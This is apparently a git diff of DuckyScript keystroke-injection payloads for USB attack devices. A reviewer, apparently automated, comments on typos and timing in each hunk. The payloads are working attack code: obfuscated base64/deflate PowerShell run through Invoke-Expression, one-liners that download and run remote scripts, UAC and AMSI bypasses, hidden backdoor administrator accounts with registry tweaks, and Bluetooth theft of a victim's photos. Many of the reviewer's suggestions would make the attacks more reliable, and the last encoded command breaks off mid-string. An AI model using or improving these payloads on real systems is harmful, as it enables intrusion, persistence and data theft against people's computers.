STRING & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} )
ENTER
STRINGLN & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} )
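Review bot: `DELAY 2000` immediately followed by `DELAY 500` ahead of `GUI r` is either a merge leftover or a single wait split in two; collapse it to one line. The description claims the payload opens an elevated console and adds a Defender exclusion, but the only executable content is the deflate-plus-base64 blob handed to `& ( $PShoME[21]+$psHOME[30]+'x')`, which nobody can review from this diff; the README or the REM_BLOCK should carry the decoded script so a reviewer can confirm that claim. Typos in the block: "Window's Defender" for "Windows Defender", "ran from" for "run from".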

View File

@ -1,15 +1,20 @@
REM Title: Shortcut-Jacker
REM_BLOCK
Title: Shortcut-Jacker
Author: I am Jakoby
REM Author: I am Jakoby
Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop
REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop
Target: Windows 10, 11
REM Target: Windows 10, 11
Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr <Your Shared link for the intended file>?dl=1; invoke-expression $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr #URL?dl=1; invoke-expression $pl
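Review bot: the REM_BLOCK still tells the user to "replace the link" without saying where; now that the link lives in `DEFINE #URL <Your Shared link for the intended file>`, name that line. `#URL?dl=1` here against `https://#URL?dl=1` in Credz-Plz and Play-WAV, with the identical placeholder text, means the three files disagree on whether the define includes the scheme; settle on one. "targets desktop" wants an apostrophe.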

View File

@ -1,30 +1,31 @@
REM Title: UrAttaControl
REM_BLOCK
Title: UrAttaControl
Author: I am Jakoby
REM Author: I am Jakoby
Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
Target: Windows 10, 11
REM Target: Windows 10, 11
NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable
EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad
REM NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable
REM EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad
You can use this function I wrote to convert your .ps1 sscripts to Base64
https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
END_REM
REM You can use this function I wrote to convert your .ps1 sscripts to Base64
REM https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
DEFINE #URL "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 1000
STRING $url = "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"
SHIFT ENTER
STRING $Payload = (Invoke-WebRequest $url'?dl=1').Content
SHIFT ENTER
STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
SHIFT ENTER
STRING exit
ENTER
STRINGLN $url = #URL
STRINGLN $Payload = (Invoke-WebRequest $url'?dl=1').Content
STRINGLN ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
STRINGLN exit
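Review bot: replacing the `SHIFT ENTER` between the four STRING lines with four STRINGLN lines changes how the input reaches PowerShell: previously the statements were submitted together on the final ENTER, now each runs on its own ENTER. Because they only share session variables ($url, $Payload) the result is the same, but it is a behavioural change that the commit message says was not made, so mention it. `DEFINE #URL "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"` keeps the quotes inside the define so `STRINGLN $url = #URL` stays valid PowerShell; that works, but it is the opposite of the other files' convention (bare value in the DEFINE, quoting in the STRINGLN), and a one-line REM would stop the next editor from "fixing" it. Typos in the block: "Reaplce", "sscripts".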

View File

@ -1,71 +1,36 @@
REM Title: Add_Local_Admin
REM Author: LulzAnarchyAnon
REM Description: Administrator PowerShell is opened, and a script
REM runs that adds a Local Admin User.
REM Target: Windows 10 PowerShell
REM Props: Darren Kitchen, and I am Jakoby
REM Version: 1.0
REM Category: Execution
REM_BLOCK
Title: Add_Local_Admin
Author: LulzAnarchyAnon
Description: Administrator PowerShell is opened, and a script runs that adds a Local Admin User.
Target: Windows 10 PowerShell
Props: Darren Kitchen, and I am Jakoby
Version: 1.0
Category: Execution
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
GUI x
DELAY 500
a
DELAY 500
STRING a
ALT y
Delay 2000
STRING $Username = "Admin2"
DELAY 2000
ENTER
STRING $Password = "password"
DELAY 2000
ENTER
STRING $group = "Administrators"
DELAY 2000
ENTER
STRING $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
DELAY 5000
ENTER
STRING $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
DELAY 5000
ENTER
STRING if ($existing -eq $null) {
DELAY 2000
ENTER
STRING Write-Host "Creating new local user $Username."
DELAY 5000
ENTER
STRING & NET USER $Username $Password /add /y /expires:never
DELAY 5000
ENTER
STRING Write-Host "Adding local user $Username to $group."
DELAY 5000
ENTER
STRING & NET LOCALGROUP $group $Username /add
DELAY 5000
ENTER
STRING }
DELAY 2000
ENTER
STRING {
DELAY 2000
ENTER
STRING Write-Host "Setting password for existing local user $Username."
DELAY 5000
ENTER
STRING $existing.SetPassword($Password)
DELAY 2000
ENTER
STRING }
DELAY 2000
ENTER
STRING Write-Host "Ensuring password for $Username never expires."
DELAY 5000
ENTER
STRING & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
DELAY 5000
ENTER
DELAY 1000
STRING exit
DELAY 100
ENTER
STRINGLN $Username = "Admin2"
STRINGLN $Password = "password"
STRINGLN $group = "Administrators"
STRINGLN $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
STRINGLN $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
STRINGLN if ($existing -eq $null) {
STRINGLN Write-Host "Creating new local user $Username."
STRINGLN & NET USER $Username $Password /add /y /expires:never
STRINGLN Write-Host "Adding local user $Username to $group."
STRINGLN & NET LOCALGROUP $group $Username /add
STRINGLN }
STRINGLN {
STRINGLN Write-Host "Setting password for existing local user $Username."
STRINGLN $existing.SetPassword($Password)
STRINGLN }
STRINGLN Write-Host "Ensuring password for $Username never expires."
STRINGLN & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
STRINGLN exit
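Review bot: `Delay 2000` (mixed case) survives the rewrite even though this commit is meant to fix compile errors; DuckyScript keywords are upper case, so it should be `DELAY 2000`, and with `DEFAULT_DELAY 500` in place the two explicit `DELAY 500` lines around `STRING a` are now redundant. In the script body, `STRINGLN }` followed by `STRINGLN {` leaves a bare script block after the `if`, so the SetPassword branch is never tied to the `$existing` check; the intent is clearly `} else {`, and joining those two lines fixes it without changing what the script does. The hard-coded `Admin2` / `password` pair could also be lifted into DEFINE lines like the `#URL` defines elsewhere in this commit.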

View File

@ -1,10 +1,14 @@
REM Title: Admin who never sleeps
REM Desc: Adds a local hidden admin user and sets power settings to never sleep.
REM Author: UberGuidoZ
REM Target: Windows (local admin required)
REM_BLOCK
Title: Admin who never sleeps
Desc: Adds a local hidden admin user and sets power settings to never sleep.
Author: UberGuidoZ
Target: Windows (local admin required)
END_REM
DUCKY_LANG US
DELAY 2000
REM Launch admin-level CMD prompt
DELAY 3000
GUI r
DELAY 1000
STRING cmd
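Review bot: the `DELAY 2000` added after `DUCKY_LANG US` sits two lines above the existing `DELAY 3000`, so the payload now idles 5 s before `GUI r`; keep one of them. The REM to REM_BLOCK conversion itself looks right.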
@ -17,31 +21,25 @@ ENTER
DELAY 1500
REM Create local admin user WinSystem with pass Some-P@ssw0rd
STRING net user WinSystem Some-P@ssw0rd /add /fullname:"Windows System" /passwordchg:no && net localgroup administrators WinSystem /add
ENTER
STRINGLN net user WinSystem Some-P@ssw0rd /add /fullname:"Windows System" /passwordchg:no && net localgroup administrators WinSystem /add
DELAY 1500
REM Set WinSystem user pass to never expire, skip UAC, and hide the user
STRING wmic useraccount where name='WinSystem' set passwordexpires=false && REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 && REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v WinSystem /t REG_DWORD /d 0
ENTER
STRINGLN wmic useraccount where name='WinSystem' set passwordexpires=false && REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 && REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v WinSystem /t REG_DWORD /d 0
DELAY 1500
REM Change power settings to avoid loss of access later (Hibernation, Standby, Disk Timeout)
STRING powercfg -h off && powercfg /x -hibernate-timeout-ac 0 && powercfg /x -hibernate-timeout-dc 0
ENTER
STRINGLN powercfg -h off && powercfg /x -hibernate-timeout-ac 0 && powercfg /x -hibernate-timeout-dc 0
DELAY 1000
STRING Powercfg /x -standby-timeout-ac 0 && powercfg /x -standby-timeout-dc 0
ENTER
STRINGLN Powercfg /x -standby-timeout-ac 0 && powercfg /x -standby-timeout-dc 0
DELAY 1000
STRING powercfg /x -disk-timeout-ac 0 && powercfg /x -disk-timeout-dc 0
ENTER
STRINGLN powercfg /x -disk-timeout-ac 0 && powercfg /x -disk-timeout-dc 0
DELAY 1000
REM Set monitor timeouts to avoid noticing system is awake
STRING powercfg /x -monitor-timeout-ac 10 && powercfg /x -monitor-timeout-dc 10
ENTER
STRINGLN powercfg /x -monitor-timeout-ac 10 && powercfg /x -monitor-timeout-dc 10
DELAY 1000
REM Exit and enjoy your user whenever!
EXIT
STRINGLN exit
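Review bot: replacing the bare `EXIT` with `STRINGLN exit` is the right fix (EXIT is not a DuckyScript command). For consistency with the `DEFINE #URL` pattern introduced elsewhere in this commit, `WinSystem` and `Some-P@ssw0rd`, which now appear in the REM comment and in three STRINGLN lines, could be DEFINE'd once so that editing one place cannot leave the `net user`, `wmic useraccount` and `REG ADD ... UserList` lines out of sync.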

View File

@ -1,41 +0,0 @@
REM Ai-Cable
REM Version 2.0
REM OS: MULTI (Tested with the OMG-Plug on Google Chrome/Windows 10 at screen resolution 1920 x 1080)
REM Author: 0iphor13
REM This payload will write its own payload, until you kill it! Maybe, if you wait long enough, it will create a payload of the month...
REM Click run and let it happen, don't move! Might not work properly on every system due to timings, screen resolution, etc...
DELAY 2000
REM Language only needed if you are not using an US layout
DUCKY_LANG de
MOUSE MOVE -10000 -10000
DELAY 200
MOUSE MOVE 200 200
DELAY 200
MOUSE CLICK 1
DELAY 200
CTRL a
DELAY 200
CTRL x
DELAY 200
STRING I will create the payload for you :)
DELAY 3000
CTRL a
DELAY 200
CTRL v
DELAY 1000
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
MOUSE MOVE -10000 -10000
DELAY 200
MOUSE MOVE 200 200
DELAY 200
ENTER
MOUSE CLICK 1
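Review bot: this file is deleted in full (`@ -1,41 +0,0`) and re-created in the next hunk (`@ -0,0 +1,29`) instead of being modified in place, which hides the real change and breaks `git log --follow` on the payload; if the file was moved or renamed, a `git mv` followed by the edit would let git record it as a rename with a small content diff.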

View File

@ -0,0 +1,29 @@
REM_BLOCK
Ai-Cable
Version 2.0
OS: MULTI (Tested with the OMG-Plug on Google Chrome/Windows 10 at screen resolution 1920 x 1080)
Author: 0iphor13
This payload will write its own payload, until you kill it! Maybe, if you wait long enough, it will create a payload of the month...
Click run and let it happen, don't move! Might not work properly on every system due to timings, screen resolution, etc...
END_REM
DUCKY_LANG de
DELAY 2000
DEFAULT_DELAY 200
MOUSE MOVE -10000 -10000
MOUSE MOVE 200 200
MOUSE CLICK 1
CTRL a
CTRL x
STRING I will create the payload for you :)
DELAY 3000
CTRL a
CTRL v
DELAY 1000
REPEAT 3 TAB
MOUSE MOVE -10000 -10000
MOUSE MOVE 200 200
ENTER
MOUSE CLICK 1
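Review bot: the `REM Language only needed if you are not using an US layout` note from the old file was dropped when `DUCKY_LANG de` moved to the top of the new version; since the payload is otherwise layout-agnostic, keep that note next to `DUCKY_LANG de` so users on a US layout know to change it. Also, `DEFAULT_DELAY 200` now applies between the presses in `REPEAT 3 TAB`, where the old file used `DELAY 100`; harmless, but worth mentioning in the commit message given the description says no content was altered.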

View File

@ -1,133 +1,62 @@
REM_BLOCK
Title: Blue_Harvester
Author: LulzAnarchyAnon
REM Title: Blue_Harvester
READ BELOW BEFORE EXECUTING PAYLOAD...
REM Author: LulzAnarchyAnon
Description: This is a Three stage payload that begins by opening bluetooth file transfer on the target device.
Next the attackers bluetooth adapter name is selected for pairing. In the second stage the last folder opened is selected followed by all of the files in the folder being selected, and added to the transfer cue.
The Third, and final stage authticates, and allows pairing between the attacker, and the target device.
Afterwards the selected files are transfered to the attackers device via bluetooth.
I selected the pictures/camera roll folder as a default for this payload, but it can be changed.
Depending on both devices certain varibles will need to be adjusted in order for this payload to run correctly.
At the beginning of the Second stage "k" is for kali (adapter name) as it is the attacker device used for payload.
NOTE: Make sure your device is Discoverable...
The cursor coordinates x,y on the screen may vary depending on device...
A Pairing request will pop up, hit CONFIRM... A Pairing accept will pop up, hit CONFIRM
I'm uncertain at the moment if this payload is more favorable for deplotment on the OMG cables, or USB Rubber Ducky (YOUR CHOICE)
Target: Windows 10
Props: Darren Kitchen and I am Jakoby
Version: 1.0
Category: Execution
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
REM READ BELOW BEFORE EXECUTING PAYLOAD...
REM STAGE 1
REM Description: This is a Three stage payload that begins by opening bluetooth file transfer on the target device.
REM Next the attackers bluetooth adapter name is selected for pairing. In the second stage the last folder opened
REM is selected followed by all of the files in the folder being selected, and added to the transfer cue.
REM The Third, and final stage authticates, and allows pairing between the attacker, and the target device.
REM Afterwards the selected files are transfered to the attackers device via bluetooth.
REM I selected the pictures/camera roll folder as a default for this payload, but it can be changed.
REM Depending on both devices certain varibles will need to be adjusted in order for this payload to run correctly.
REM At the beginning of the Second stage "k" is for kali (adapter name) as it is the attacker device used for payload.
REM NOTE: Make sure your device is Discoverable...
REM The cursor coordinates x,y on the screen may vary depending on device...
REM A Pairing request will pop up, hit CONFIRM... A Pairing accept will pop up, hit CONFIRM
REM I'm uncertain at the moment if this payload is more favorable for deplotment on the OMG cables, or
REM USB Rubber Ducky (YOUR CHOICE)
REM Target: Windows 10
REM Props: Darren Kitchen and I am Jakoby
REM Version: 1.0
REM Category: Execution
REM STAGE 1
GUI
DELAY 50
STRING fsquirt
DELAY 200
ENTER
DELAY 500
GUI
STRINGLN fsquirt
SPACE
DELAY 500
REM STAGE 2
k
DELAY 500
STRING k
ENTER
DELAY 500
SPACE
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
REPEAT 8 TAB
ENTER
DELAY 500
CTRL a
DELAY 500
ENTER
DELAY 500
TAB
DELAY 500
ENTER
REM STAGE 3
GUI
DELAY 50
STRING powershell -windowstyle hidden
DELAY 1000
ENTER
DELAY 5000
STRING Add-Type -AssemblyName System.Windows.Forms
DELAY 2000
ENTER
STRING $p1 = [System.Windows.Forms.Cursor]::Position.X = 1837
DELAY 2000
ENTER
STRING $p2 = [System.Windows.Forms.Cursor]::Position.Y = 1050
DELAY 2000
ENTER
DELAY 2000
STRING [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point($p1, $p2)
DELAY 2000
ENTER
DELAY 500
GUI
STRINGLN powershell -windowstyle hidden
STRINGLN Add-Type -AssemblyName System.Windows.Forms
STRINGLN $p1 = [System.Windows.Forms.Cursor]::Position.X = 1837
STRINGLN $p2 = [System.Windows.Forms.Cursor]::Position.Y = 1050
STRINGLN [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point($p1, $p2)
MOUSE CLICK 1
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 1000
ALT SPACE
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
REPEAT 6 DOWNARROW
ENTER
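Review bot: the 5 s wait after launching PowerShell was removed: the old version had `DELAY 5000` after the ENTER that followed `STRING powershell -windowstyle hidden`, while the new version relies on `DEFAULT_DELAY 500` before `STRINGLN Add-Type -AssemblyName System.Windows.Forms`, so the first script line is likely to be typed before the console exists; restore `DELAY 5000` there (the `DELAY 2000` pauses between the `$p1`/`$p2` lines were also dropped). The REM_BLOCK also carries over `authticates`, `transfered`, `varibles` and `deplotment`; since this is a typo pass, correct them here.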

View File

@ -1,14 +1,15 @@
#-----------------------------------------------------------------------------------------------------------
REM_BLOCK
# Title: Use a DNS TXT record to get the commands you want to execute instead of typing them in
# Description: An example of how you could use DNS TXT records to get the powershell code you want to run.
# This POC will get some commands that will play a message on a victims computer using Windows
# build speach engine. It also turns up the volume first, then speak out loud the text you want.
# build speach engine. It also turns up the volume first, then speak out loud the text you want.
# Author: Keld Norman / Twitter: @keld_norman
# Props: Google, RTFM, and trial and errors
# Version: 1.0
# Category: Execution
# Target: Windows10+ Powershell
# Attackmodes: HID
#-----------------------------------------------------------------------------------------------------------
# Quick Guide
#-----------------------------------------------------------------------------------------------------------
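Review bot: the first `#-----` separator line stays outside the new `REM_BLOCK`, which starts on the line after it; if `#` is not a comment marker for the O.MG compiler that first line will fail to parse, so move `REM_BLOCK` above it (and put `END_REM` after the closing separator). While here, `speach` and `victims computer` in the description should read `speech` and `victim's computer`.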
@ -37,12 +38,14 @@ for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|
#-----------------------------------------------------------------------------------------------------------
# In OMG code that would be:
#-----------------------------------------------------------------------------------------------------------
END_REM
DEFINE #URL omg.yourdomain.com
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 1000
STRING CMD
ENTER
STRINGLN CMD
DELAY 500
STRING for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command -
ENTER
#-----------------------------------------------------------------------------------------------------------
STRINGLN for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" #OMG 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command -
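Review bot: the define and its use do not match: `DEFINE #URL omg.yourdomain.com` is declared, but the STRINGLN line passes `#OMG` to `nslookup "-q=txt"`, so the placeholder is never substituted and the lookup queries a literal `#OMG`; change it to `#URL` (or rename the define). The trailing `#-----` separator that was dropped along with the old `STRING`/`ENTER` pair should also be checked: either it belonged inside the REM_BLOCK or it was stray.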

View File

@ -1,46 +1,7 @@
DELAY 500
DUCKY_LANG de
DELAY 1500
GUI r
DELAY 500
STRING powershell
DELAY 250
ENTER
DELAY 2000
STRING powershell.exe -enc JABQAD0AIgBjAG0AZAAuAGUAeABlACAALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAE4AZQB3AC0ASQB0AGUAbQAgAC
GUI r
STRINGLN powershell
DELAY 200
STRING cASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABBAE0AUwBJAFwAUAByAG8AdgBpAGQAZQByAHMAXAB7ADIA
DELAY 200
STRING NwA4ADEANwA2ADEARQAtADIAOABFADAALQA0ADEAMAA5AC0AOQA5AEYARQAtAEIAOQBEADEAMgA3AEMANQA3AEEARgBGAH0AJwAgAC0ARgBvAHIAYwBl
DELAY 200
STRING ADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8A
DELAY 200
STRING ZgB0AFwAQQBNAFMASQBcAFAAcgBvAHYAaQBkAGUAcgBzAFwAewAyADcAOAAxADcANgAxAEUALQAyADgARQAwAC0ANAAxADAAOQAtADkAOQBGAEUALQBC
DELAY 200
STRING ADkARAAxADIANwBDADUANwBBAEYARQB9ACcAIAAtAFIAZQBjAHUAcgBzAGUAOwAgAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABwAG8AdwBlAHIAcwBoAGUA
DELAY 200
STRING bABsACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJwBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAH
DELAY 200
STRING QAdABpAG4AZwBzAFwAJwAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBz
DELAY 200
STRING AGgAZQBsAGwALgBlAHgAZQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA7AE4AZQB3AC0ASQB0AGUAbQAgACIASABLAEMAVQA6AFwAUwBvAGYAdA
DELAY 200
STRING B3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACI
DELAY 200
STRING AIAAtAEYAbwByAGMAZQA7ADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3
DELAY 200
STRING AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIA
DELAY 200
STRING AtAE4AYQBtAGUAIAAiAEQAZQBsAGUAZwBhAHQAZQBFAHgAZQBjAHUAdABlACIAIAAtAFYAYQBsAHUAZQAgACIAIgAgAC0ARgBvAHIAYwBlADsAUwBlAHQAL
DELAY 200
STRING QBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcA
DELAY 200
STRING G0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiACgAZABlAGYAYQB
DELAY 200
STRING 1AGwAdAApACIAIAAtAFYAYQBsAHUAZQAgACQAUAAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABv
DELAY 200
STRING AHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASAB
DELAY 200
STRING pAGQAZABlAG4AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzAA==;Start-Sleep -s 3;exit
DELAY 100
ENTER
STRINGLN powershell.exe -enc JABQAD0AIgBjAG0AZAAuAGUAeABlACAALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAE4AZQB3AC0ASQB0AGUAbQAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABBAE0AUwBJAFwAUAByAG8AdgBpAGQAZQByAHMAXAB7ADIANwA4ADEANwA2ADEARQAtADIAOABFADAALQA0ADEAMAA5AC0AOQA5AEYARQAtAEIAOQBEADEAMgA3AEMANQA3AEEARgBGAH0AJwAgAC0ARgBvAHIAYwBlADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAQQBNAFMASQBcAFAAcgBvAHYAaQBkAGUAcgBzAFwAewAyADcAOAAxADcANgAxAEUALQAyADgARQAwAC0ANAAxADAAOQAtADkAOQBGAEUALQBCADkARAAxADIANwBDADUANwBBAEYARQB9ACcAIAAtAFIAZQBjAHUAcgBzAGUAOwAgAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJwBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAJwAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAiADsAUwB0AGEAcgB0AC0AUw